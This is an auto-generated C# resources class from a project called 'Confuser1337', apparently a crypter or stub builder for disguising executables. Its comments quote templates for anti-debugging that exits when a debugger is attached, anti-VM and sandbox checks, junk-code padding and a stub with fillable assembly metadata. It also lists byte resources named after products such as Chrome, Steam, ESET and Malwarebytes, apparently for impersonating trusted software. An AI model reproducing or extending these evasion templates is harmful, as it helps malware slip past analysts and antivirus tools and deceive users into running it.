//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Confuser1337.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Confuser1337.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] adobe {
            get {
                object obj = ResourceManager.GetObject("adobe", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to System.Timers.Timer %timer% = new System.Timers.Timer();
        ///    %timer%.Elapsed+=new ElapsedEventHandler(%DEBUGCLASS%.%timer2%);
        ///    %timer%.Interval=2500;
        ///    %timer%.Enabled=true;.
        /// </summary>
        internal static string antidebug2 {
            get {
                return ResourceManager.GetString("antidebug2", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to public class %DEBUGCLASS%{
        ///	public static void %timer2%(object source, ElapsedEventArgs e)
        /// {
        ///     try{
        ///	 if (Debugger.IsAttached || Debugger.IsLogging())
        ///            {
        ///			Environment.Exit(0);
        ///            }
        ///	}catch{
        ///	}
        /// }
        /// }.
        /// </summary>
        internal static string antidebug3 {
            get {
                return ResourceManager.GetString("antidebug3", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to 	public class %ANTICLASS%{
        ///		[DllImport(&quot;kernel32.dll&quot;)]
        ///        public static extern IntPtr GetModuleHandle(string lpModuleName);
        ///        [DllImport(&quot;advapi32.dll&quot;, SetLastError = true)]
        ///        public static extern bool GetUserName(StringBuilder sb, ref Int32 length);
        ///        [DllImport(&quot;kernel32&quot;)]
        ///        static extern bool IsDebuggerPresent();
        ///        [DllImport(&quot;user32.dll&quot;, SetLastError = true)]
        ///        static extern IntPtr FindWindow(string lpClassName, IntPtr ZeroOnly);
        ///        [DllImport( [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string antivm {
            get {
                return ResourceManager.GetString("antivm", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to     if (%ANTICLASS%.%sbox%(Application.StartupPath))
        ///            {
        ///                Application.Exit();
        ///            }
        ///            
        ///            if (%ANTICLASS%.%vm__%())
        ///            {
        ///                Application.Exit();
        ///            }.
        /// </summary>
        internal static string antivm2 {
            get {
                return ResourceManager.GetString("antivm2", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] chrome {
            get {
                object obj = ResourceManager.GetObject("chrome", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.IO;
        ///using System.Linq;
        ///using System.Reflection;
        ///using System.Threading;
        ///using System.Windows.Forms;
        ///using System.Collections.Generic;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///using System.Security.Cryptography;
        ///using System.Timers;
        ///using System.Diagnostics;
        ///using System.ComponentModel;
        ///using System.Data;
        ///using System.Management;
        ///using Microsoft.Win32;
        ///
        ///[assembly: AssemblyTitle(&quot;%title%&quot;)]
        ///[assembly: AssemblyDescription(&quot;%description%&quot;)]
        ///[assembly [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string dastub {
            get {
                return ResourceManager.GetString("dastub", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] eset {
            get {
                object obj = ResourceManager.GetObject("eset", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] flstudio {
            get {
                object obj = ResourceManager.GetObject("flstudio", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to public class %class%{
        ///
        ///
        ///.
        /// </summary>
        internal static string junk1 {
            get {
                return ResourceManager.GetString("junk1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to public void %void%{
        /////junk
        ///
        ///}.
        /// </summary>
        internal static string junk2 {
            get {
                return ResourceManager.GetString("junk2", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        internal static System.Drawing.Icon leet {
            get {
                object obj = ResourceManager.GetObject("leet", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] mbam {
            get {
                object obj = ResourceManager.GetObject("mbam", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] obs {
            get {
                object obj = ResourceManager.GetObject("obs", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Skype {
            get {
                object obj = ResourceManager.GetObject("Skype", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] steam {
            get {
                object obj = ResourceManager.GetObject("steam", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] trend {
            get {
                object obj = ResourceManager.GetObject("trend", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] vnc {
            get {
                object obj = ResourceManager.GetObject("vnc", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
